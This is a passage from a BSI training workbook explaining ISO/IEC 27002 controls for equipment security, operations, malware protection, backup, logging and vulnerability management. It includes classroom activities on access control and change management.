where possible, or subject to adequate alternative protection, such as shielded overhead gantries.
Consideration should be given to the possible interference of power cables with communications
cabling and should be segregated as necessary.
Additional measures to be considered for the protection of sensitive or critical systems may include
measures such as installation of armoured cabling conduit, locked rooms or boxes at inspection and
termination points and the use of electromagnetic shielding to protect the cables. It may also be
necessary to undertake technical sweeps and/or physical inspections for unauthorized devices being
attached to the cables.
11.2.4 Equipment maintenance
Equipment should be correctly maintained to ensure its continued availability and integrity
Equipment should be correctly maintained, in accordance with the supplier’s recommended service
intervals and specifications, regulatory and insurers’ requirements and carried out by authorized
maintenance personnel.
Where equipment requires ongoing maintenance, schedules should be put in place to ensure
necessary maintenance work is carried out in a timely manner and appropriate records are kept,
including records of suspected or actual faults as well as preventive and corrective maintenance
activities undertaken. Before putting equipment back into operation after its maintenance, it may
need to be inspected to ensure that the equipment has not been tampered with and does not
malfunction.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
59
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
11.2.5 Removal of assets
Equipment, information or software should not be taken off-site without prior authorization.
Organizations should implement policy provisions to ensure that all personnel understand the rules
concerning removal of assets from its premises, the authorities required for removal of assets and
associated procedures. Where necessary and appropriate, assets should be recorded when removed
off-site and when returned, and where appropriate setting time limits for asset removal set and
returns, which should be verified. Procedures for asset removal should, as appropriate to the risk of
removal of the asset, include provisions to record and/or verify the identity, role and affiliation of
anyone who handles or uses the removed asset and this documentation returned with the equipment,
information or software.
Spot checks, if needed to be undertaken to detect unauthorized removal of assets, can also be
performed to prevent unauthorized assets being brought onto premises, such as recording devices,
weapons, etc. Such spot checks should be carried out in accordance with relevant legislation and
regulations. Individuals should be made aware that spot checks are carried out, and the verifications
should only be performed with authorization appropriate for the legal and regulatory requirements.
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
60
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
11.2.6 Security of equipment and assets off-premises
Security should be applied to off-site assets taking into account the different risks of working outside
the organization’s premises.
Assets are commonly used away from the organization’s premises and any information-storing and
processing equipment being used outside the organization’s premises should be authorized by
management. This applies to equipment owned by the organization and that equipment owned
privately and used on behalf of the organization.
The protection of off-site equipment should include considerations for the physical and environmental
security of assets. Controls for home-working, teleworking and use of temporary sites should be
determined by a risk assessment and applied as appropriate. For example, assets should not left
unattended in public spaces and a line of sight relationship should be maintained with computing
devices when travelling. Other physical and environmental premises security controls to be
considered include secure physical storage, clear desk policy, access controls for computers and
secure communication with the office (see also ISO/IEC 27033[15][16][17][18][19]). Risks of
damage, theft or eavesdropping, may vary considerably between locations and should be taken into
account in determining the most appropriate controls. More information on protecting mobile
equipment can be found in 6.2.
When off-premises equipment is transferred among different individuals or external parties, it may be
necessary to maintain a log that defines the chain of custody for the equipment including at least
names and organizations of those who are responsible for the equipment.
11.2.7 Secure disposal or re-use of equipment
All items of equipment containing storage media should be verified to ensure that any sensitive data
and licensed software has been removed or securely overwritten prior to disposal or re-use.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
61
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
Organizations remain responsible for data beyond the disposal of the supporting assets that stores or
processes it. Data can be compromized through careless disposal or re-use of equipment. It is, therefore,
vital to check that any sensitive data or licensed software has been removed or securely overwritten prior to
disposal or re-use of equipment. Storage media containing confidential or copyrighted information should be
physically destroyed or the information should be destroyed, deleted or overwritten using techniques to
make the original information non-retrievable. Techniques for securely overwriting storage media differ
according to the storage media technology, overwriting tools should be reviewed to make sure that they are
applicable to the technology of the storage media.
Damaged equipment containing storage media may require a risk assessment to determine whether the
items should be physically destroyed rather than sent for repair or discarded.
In addition to secure disk erasure, whole-disk encryption reduces the risk of disclosure of confidential
information when equipment is disposed of or redeployed, provided that the:
• Encryption process is sufficiently strong and covers the entire disk
• Encryption keys are long enough to resist brute force attacks
• Encryption keys are themselves kept confidential
For further information on encryption see Clause 10
11.2.8 Unattended user equipment
Users should ensure that unattended equipment has appropriate protection.
All users should be made aware of the security requirements and procedures for protecting unattended
equipment, as well as their responsibilities for implementing such protection. Users responsibilities when
leaving equipment unattended should include:
• Logging off unneeded applications or network services
• Ensuring their device is locked and/or active user sessions are terminated
Whilst automated device lock screen controls may be enabled, these should not be relied upon by users.
11.2.9 Clear desk and clear screen policy
A clear desk policy for papers and removable storage media and a clear screen policy for information
processing facilities should be adopted.
A clear desk/clear screen policy reduces the risks of unauthorized access, loss of and damage to information
during and outside normal working hours and protects users who are accountable for their own use of
equipment and network services.
An organization’s clear desk (e.g. for paper or electronic storage media) and clear screen policy should take
into account its information classifications (see 8.2), based on legal and contractual requirements (see
18.1), organizational risks and culture.
Clear desk and clear screen provisions should ensure that sensitive or critical business information is
appropriately locked away when not required or when the office is unattended.
Use of printers, scanners, copiers (and any other form of reproductive technology) should be controlled and
restricted to authorized users (such as through the use of follow me printing or other forms of device user
authentication) and printed material should be removed from printers immediately.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
62
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
Activity 6: Access control
Purpose:
Select controls from Clauses 9, 10 and 11 of ISO/IEC 27002 to protect information assets against
unauthorized access
Duration:
25 minutes in pairs
15 minutes feedback and discussion
Directions:
Using the table over the page and working in pairs, identify 2 controls taken from anywhere within
Clauses 9, 10 and 11 of ISO/IEC 27002 which you feel are best suited to protecting the listed
information asset from unauthorized access. For each control selected, provide a justification for your
choice.
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
63
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
Payroll information
Website source code
Communication room
Technology staff
Laptops
Asset
Controls
Justification
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
64
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
12.1 Operational procedures and responsibilities
Objective: To ensure correct and secure operations of information processing facilities.
12.1.1 Documented operating procedures
Operating procedures should be documented and made available to all users who need them
There are a number of business processes that are key to information security and to running secure
operations. To ensure correct, repeatable and consistent operations, some of the activities within
these processes require formalization through documented operating procedures. Examples of typical
procedures that require documentation include backups, equipment maintenance, media handling,
visitor management, working in secure areas, installation and configuration of systems,
nonconformity or error handling, support and escalation, system restart and recovery procedures for
use in the event of system failure, event logging and monitoring.
12.1.2 Change management
Changes to the organization, business processes, information processing facilities and systems that
affect information security should be controlled.
Without effective change management, security vulnerabilities can be introduced leading to data
being compromised, often because security requirements have not been fully considered. Change
management (covering changes to the organization, business processes, information processing
facilities and systems that could affect information security) should be a business-centric process that
involves all appropriate stakeholders and ensures the maintenance and integrity of security controls.
Key activities within the change management process include:
• Identification and recording of significant changes
• Planning and testing of changes
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
65
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
Impact assessment, including information security impacts of changes
Formal approval procedure for proposed changes
Verification that information security requirements have been met
Communication of change details to all relevant persons
Fall-back procedures, including procedures and responsibilities for aborting and recovering from
unsuccessful changes and unforeseen events
• Provision of an emergency change process to enable quick and controlled implementation of
changes needed to resolve an incident (see 16.1)
•
•
•
•
•
Formal management responsibilities and procedures should be in place to ensure satisfactory control
of all changes.
12.1.3 Capacity management
The use of resources should be monitored, tuned and projections made of future capacity
requirements to ensure the required system performance
Security and operational processes and systems depend on adequate resource availability to achieve
required performance levels. Resources to be considered include human resource capacity, premises,
processing resources, storage space, bandwidth, power supply etc.
Even where technology services are provided in the Cloud (offering scalability and elasticity) capacity
requirements for business critical resources should be identified and usage monitored.
Future capacity projections should be made as appropriate, to ensure resource requirements are
properly planned for and where necessary, used to improve the availability and efficiency of systems.
Particular attention should be paid to any critical resources with long procurement lead times, with
specialist requirements or with high costs.
Through analysis of capacity monitoring results and usage trends, managers should flag and avoid
potential bottlenecks and dependences on key personnel that might present a threat to system
security or services, and plan appropriate action.
Providing sufficient capacity can be achieved by increasing capacity or by reducing demand.
Managing capacity demand may be achieved in a number of ways including the deletion of obsolete
data (disk space), decommissioning or reusing redundant resources, optimizing processes and
application logic, denying or restricting bandwidth for any resource-hungry services which are not
business critical (e.g. video streaming).
A documented capacity management plan should be considered for business critical resources.
12.1.4 Separation of development, testing and operational environments
Development, testing, and operational environments should be separated to reduce the risks of
unauthorized access or changes to the operational environment.
Development and testing activities can cause significant problems in the operational environment e.g.
unwanted modification of files or system environment or system failure.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
66
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
There is a need to maintain a known and stable environment in which to perform meaningful testing
and to prevent inappropriate developer access to the operational environment.
Requirements for the appropriate separation of development, testing, and operational environments
should be identified and implemented to reduce the risks of unauthorized access or changes to the
operational environment. Policy provisions for the management of environments and the transfer of
data between them should be established.
The following items should be considered in relation to the separation of environments:
• Development and operational software should run on different systems or computer processors
and in different domains or directories
• Wherever possible, changes to operational systems and applications should be tested in a testing
or staging environment prior to being promoted to live operational systems
• Development tools and systems utilities should not be accessible from operational systems when
not required
• Users of development, test and operational environments should use different user profiles when
working in different environments and menus should display appropriate identification messages to
reduce the risk of error and in some systems reduce the risk of fraud
• Sensitive data should not be copied into the testing system environment unless equivalent controls
are provided for the testing system (see 14.3)
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
67
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
12.2 Protection from malware
Objective: To ensure that information and information processing facilities are protected against
malware.
12.2.1 Controls against malware
Detection, prevention and recovery controls to protect against malware should be implemented,
combined with appropriate user awareness.
Malware and cyber crime are becoming ever more prevalent with ever changing attack vectors
emerging. Protecting against malware needs to include a combination of detection, prevention and
recovery controls in addition to appropriate user awareness.
Malware prevention, detection and repair software should be used and updated, alongside a
programme capable of being both proactive and reactive to promote user security awareness.
Malware detection and repair software to scans of computers and media should include scanning of
any files received over networks or via any form of storage medium, for malware before use,
electronic mail attachments and downloads before use (this scan may be carried out at different
places, e.g. at electronic mail servers, desktop computers and when entering the network of the
organization) and web pages for malware.
Vulnerability management is another vital component to reduce vulnerabilities that could be exploited
by malware (see 12.6).
Other key supporting controls include appropriate system access and change management controls.
Organizations should make anti-malware policy provisions that may include:
• Prohibiting the use of unauthorized software (see 12.6.2 and 14.2)
• Prohibiting interference with security controls and settings
• Requirements for conducting regular reviews of the software and data content of systems
supporting critical business processes
• Investigating the presence of any unapproved files or unauthorized amendments
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
68
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
• Defining and maintaining procedures and responsibilities to deal with malware protection on
systems, training in their use, reporting and recovering from malware attacks
• Preparing appropriate business continuity plans for recovering from malware attacks, including all
necessary data and software backup and recovery arrangements (see 12.3)
• Obtaining appropriate malware threat intelligence and malware verification from qualified sources
(such as subscribing to vendor mailing lists, special interest groups or verifying websites giving
information about new malware)
• Isolating environments where catastrophic impacts may result
• Taking precautions to protect against the introduction of malware during maintenance and
emergency procedures, which may bypass normal malware protection controls
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
69
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
12.3 Backup
Objective: To protect against loss of data
12.3.1 Information backup
Backup copies of information, software and system images should be taken and tested regularly in
accordance with an agreed backup policy
Information classification (including availability requirements) should be taken into account when
establishing an organization’s backup policy, retention and protection requirements. Backup copies of
information, software and system images should be taken and tested regularly in accordance with an
agreed backup policy, including the requirement to monitor the execution of backups and address
failures of scheduled backups to ensure their completeness.
Adequate backup facilities should be provided to ensure that all essential information and software
can be recovered following a disaster or media failure. The extent (e.g. full or differential backup)
and frequency of backups should reflect business and security requirements of the information
involved and the criticality of the information to the continuity of the organization.
Backup requirements should be documented and planned including appropriate arrangements for:
• Maintaining accurate and complete records of backup copies
• Restoring backups and performing regular restore testing on dedicated test media
• Securely storing backups (either virtual or with adequate physical geographic separation from the
original data source)
• Applying appropriate environmental protection for the storage of back ups
• Encrypting sensitive back up data
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
70
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
12.4 Logging and monitoring
Objective: To record events and generate evidence.
12.4.1 Event logging
Event logs recording user activities, exceptions, faults and information security events should be
produced, kept and regularly reviewed.
Event logging is critical in the detection of security incidents and events and in the generation of
evidence, and set the foundation for automated monitoring systems which are capable of generating
consolidated reports and alerts on system security.
Requirements for capturing system metadata within event logs should be specified for each system,
type or group of systems. Organizations reviewing their event logging capabilities as a precursor to
developing security incident and event monitoring should review what event logging data is currently
being captured versus what data is required and develop plans to address the gaps.
Examples of data collected within event logs include:
• User and device identity
• System activities
• Dates, times and details of key events (e.g. log-on and log-off)
• Records of successful and rejected system access attempts
• Records of successful and rejected data and other resource access attempts
• Changes to system configuration
• Use of privileges
• Use of system utilities and applications
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
71
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
• Network addresses and protocols
• Alarms raised by the access control system
• Activation and de-activation of protection systems, such as anti-virus systems and intrusion
detection systems
• Records of transactions executed by users in applications
12.4.2 Protection of log information
Logging facilities and log information should be protected against tampering and unauthorized
access.
Logging facilities and log information should be protected against tampering, unauthorized access
and changes including alterations to the message types that are recorded and log files being edited
or deleted. System logs need to be protected, because if the data can be modified or data in them
deleted, their existence may create a false sense of security. Real-time copying of logs to a system
outside the control of a system administrator or operator or storage separation can be used to
safeguard logs.
It is important to manage and monitor the storage capacity of the log file media to ensure capacity is
not exceeded, resulting in either the failure to record events or over-writing of past recorded events.
Some audit logs may be required to be archived as part of the record retention policy or because of
requirements to collect and retain evidence (see 16.1.7).
System logs often contain a large volume of information, much of which is extraneous to information
security monitoring. To help identify significant events for information security monitoring purposes,
the copying of appropriate message types automatically to a second log, or the use of suitable
system utilities or audit tools to perform file interrogation and rationalization, should be considered.
12.4.3 Administrator and operator logs
System administrator and system operator activities should be logged and the logs protected and
regularly reviewed.
Accounting for the actions performed by systems administrators (privileged users) and by users is
important in the event of investigating security breaches. Privileged user account holders may be able
to manipulate the logs on information processing facilities under their direct control, therefore it is
necessary to protect and review the logs to maintain accountability for the privileged users.
An intrusion detection system (IDS) managed outside of the control of system and network
administrators can be used to monitor system and network administration activities for compliance.
12.4.4 Clock synchronization
The clocks of all relevant information processing systems within an organization or security domain
should be synchronized to a single reference time source.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
72
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
Another important component in ensuring the accuracy of audit logs and the collection of evidence in
the event of a security breach, legal or disciplinary case is the synchronization of time references. All
requirements (internal or external) for time representation, synchronization and accuracy should be
documented. Such requirements can be legal, regulatory, contractual requirements, standards
compliance or requirements for internal monitoring.
The clocks of all relevant information processing systems within an organization or security domain
should be synchronized to a defined single standard reference time source. The organization’s
approach to obtaining a reference time from external source(s) and how to synchronise internal
clocks reliably should be documented and implemented, such as using the network time protocol
(NTP).
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
73
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
12.5 Control of operational software
Objective: To ensure the integrity of operational systems.
12.5.1 Installation of software on operational systems
Procedures should be implemented to control the installation of software on operational systems.
Uncontrolled installation of software on computing devices can lead to the introduction or exploitation
of known vulnerabilities and then to information leakage, data corruption, loss of availability through
ransomware attacks or other information security incidents, or, to the violation of intellectual property
rights. Procedures for software installation are, therefore, needed to protect the integrity of
operational systems.
Vendor supplied software used in operational systems should be maintained at a level supported by
the supplier. Over time, software vendors cease to support older versions of software and
organizations should assess the risks of relying on unsupported software.
Decisions to upgrade to a new release should take into account the business requirements for the
change and the security of the release, e.g. the introduction of new information security functionality
or the number and severity of information security problems affecting this version. Software patches
should be applied when they can help to remove or reduce information security weaknesses (see
12.6).
Physical or logical access should only be given to suppliers for support purposes when necessary and
with management approval. The supplier’s activities should be monitored (see 15.2.1).
Computer software may rely on externally supplied software and modules, which should be
monitored and controlled to avoid unauthorized changes, which could introduce security weaknesses.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
74
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
The following considerations should be taken to control changes of software on operational systems:
• Restricting the updating of the operational software, applications and program libraries to only be
performed by trained administrators upon appropriate management authorization (see 9.4.5)
• Holding only approved executable code and not development code or compilers within operational
systems
• Establishing requirements for extensive and successful testing prior to installation, including
usability, security, effects on other systems and user friendliness. Tests should be carried out on
separate systems (see 12.1.4) and all corresponding program source libraries must be updated
• Establishing a configuration control system to keep control of all implemented software as well as
system documentation
• Ensuring a rollback strategy is in place before changes are implemented
• Maintaining an audit log of all updates to operational program libraries
• Retaining previous versions of application software as a contingency measure
• Establishing archive and retention requirements for old versions of software, together with all
required information and parameters, procedures, configuration details and supporting software
for as long as the data is retained in archive
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
75
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
12.6 Technical vulnerability management
12.6.1 Management of technical vulnerabilities
Information about technical vulnerabilities of information systems being used should be obtained in a
timely fashion, the organization’s exposure to such vulnerabilities evaluated and appropriate measures
taken to address the associated risk.
Technical vulnerability management is an essential control in the prevention of exploitation of technical
vulnerabilities, increasingly used by cyber criminals to deliver ransomware and other malware payloads.
Vendors are often under significant pressure to release patches as soon as possible. A consequence of
rushing the release of patches is that patches can sometimes have negative side effects, increasing the
need for patches to be tested. If adequate testing of the patches is not possible, e.g. because of costs
or lack of resources, a delay in patching can be considered in order to assess the associated risks,
based on the experience reported by other users. The use of ISO/IEC 27031[14] can be beneficial. The
application of security patches should, however, always be treated as a high priority.
Information on the technical vulnerabilities of information systems being used should be obtained in a
timely fashion, the organization’s exposure to such vulnerabilities evaluated and appropriate measures
taken to address the associated risk. Appropriate and timely action should be taken in response to the
identification of potential technical vulnerabilities.
Technical vulnerability management can be viewed as a sub-function of change management and, as
such, can take advantage of the change management processes and procedures (see 12.1.2 and
14.2.2).
A current and complete inventory of assets (see Clause 8) is a prerequisite for effective technical
vulnerability management. Specific information needed to support technical vulnerability management
includes the software vendor, version numbers, current state of deployment (e.g. what software is
installed on what systems) and the person(s) within the organization responsible for the software.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
76
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
In order to establish an effective management process for technical vulnerabilities, organizations should
consider:
• Defining and establishing the roles and responsibilities associated with technical vulnerability
management, including vulnerability monitoring, vulnerability risk assessment, patching, asset tracking
and any coordination responsibilities required
• Establishing and updating information resources for software and other technology that will be used to
identify relevant technical vulnerabilities and to maintain awareness about them (these should be based
on the asset inventory list, see 8.1.1)
• Defining a timeline to react to notifications of potentially relevant technical vulnerabilities
• Identifying the associated risks and the actions to be taken once a potential vulnerability has been
identified; such action could involve patching of vulnerable systems or applying other controls
• Implementing either change management or information security incident response procedures to
manage actions to address identified vulnerabilities, depending on how urgently a technical vulnerability
needs to be addressed
• Assessing risks associated with installing the patch (the risks posed by the vulnerability should be
compared with the risk of installing the patch)
• Testing and evaluating patches, where possible, to ensure they are effective and do not result in side
effects that cannot be tolerated; if no patch is available, other controls should be considered, such as:
• Turning off services or capabilities related to the vulnerability
• Adapting or adding access controls, e.g. firewalls, at network borders (see 13.1)
• Increased monitoring to detect actual attacks
• Raising awareness of the vulnerability
• Maintaining an audit log for all procedures undertaken
• Regularly monitoring and evaluating the effectiveness and efficiency of the technical vulnerability
management process
• Prioritizing vulnerability management actions, i.e. systems at high risk should be addressed first
• Aligning the technical vulnerability management process with incident management activities, to
communicate data on vulnerabilities to the incident response function and to provide technical
procedures should an incident occur
• Defining a procedure to address the situation where a vulnerability has been identified but there is no
suitable countermeasure. In this situation, the organization should evaluate risks relating to the known
vulnerability and define appropriate detective and corrective actions
12.6.2 Restrictions on software installation
Rules governing the installation of software by users should be established and implemented.
Policy provisions to restrict the installation of software by users should be established and implemented.
The principle of least privilege should be applied. If certain privileges have been granted, users may have
the ability to install software. The organization should identify what types of software installations are
permitted (e.g. updates and security patches to existing software and authorized software list) and what
types of installations are prohibited (e.g. software that is only for personal use and software whose
pedigree with regard to being potentially malicious is unknown or suspect). Organizations may also wish
to consider communicating a process for evaluating and approving new software.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
77
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
12.7 Information systems audit considerations
Objective: To minimize the impact of audit activities on operational systems
12.7.1 Information systems audit controls
Audit requirements and activities involving verification of operational systems should be carefully
planned and agreed to minimize disruptions to business processes.
Information system audit activities involving the verification of operational systems should be
carefully defined, scheduled (running audit tests that could conflict with system availability
requirements out of hours or peak periods), planned and agreed with appropriate management to
minimize disruptions to business processes. The scope of technical audit tests should be agreed and
controlled.
Audit tests should be limited to read-only access to software and data. Access other than read-only
should only be allowed for isolated copies of system files, which should be erased when the audit is
completed, or given appropriate protection if there is an obligation to keep such files under audit
documentation requirements. All access should be monitored and logged to produce a reference trail.
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
………………………………………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
78
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
Activity 7: Change management
Purpose: Complete a change request form.
Duration:
25 minutes individual
15 minutes feedback and discussion
Directions:
ABC Organization Ltd has identified a need to upgrade the current Windows 2008 R2 server (which
hosts the company’s website) for a more up-to-date Windows 2016 server. This upgrade is likely to
cause severe disruption to the business if it is not managed appropriately.
You are responsible for managing the change and in the first instance, you need to complete a
change request form.
Working in pairs or in small groups, complete the change request form below with the goal of
ensuring that the change is managed appropriately. Your response along with those from other
groups will then be discussed by the whole class.
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
79
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
